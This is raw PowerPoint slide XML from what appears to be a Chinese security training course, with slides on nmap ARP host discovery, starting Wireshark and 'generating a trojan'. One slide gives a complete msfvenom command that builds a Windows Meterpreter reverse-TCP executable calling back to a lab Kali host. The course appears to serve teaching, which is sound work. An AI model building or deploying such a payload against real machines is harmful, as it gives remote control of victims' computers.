          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.本机为Kali Linux，其IP为：192.168.172.128；目标主机为Win7操作系统，其IP为：192.168.172.133。使用“sfvenom --arch x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.172.128 lport=5555 -f exe -o shell.exe”命令生成木马文件，如图2-4-54所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5154295" y="3549650"/>
            <a:ext cx="5276850" cy="866775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="文本框 143"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5154295" y="4416425"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-54 使用msfvenom模块生成木马文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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a:xfrm>
            <a:off x="533756" y="1946091"/>
            <a:ext cx="4302496" cy="638783"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="4302496" cy="638783"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="2086269"/>
              <a:ext cx="3636897" cy="306705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行ARP的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="1754191"/>
              <a:ext cx="936625" cy="368300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>步骤一 </a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5462905" y="1126808"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.使用“wireshark”命令启动Wireshark工具，准备抓取数据包，如图2-2-2所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5462905" y="1846263"/>
            <a:ext cx="5276850" cy="3505200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="文本框 101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5462905" y="5351463"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-2 启动Wireshark工具</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3855085" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3855085" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="7030A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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3189605" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用msfvenom模块生成木马的方法</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤二</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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12" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.5 生成木马</a:t>
            </a:r>
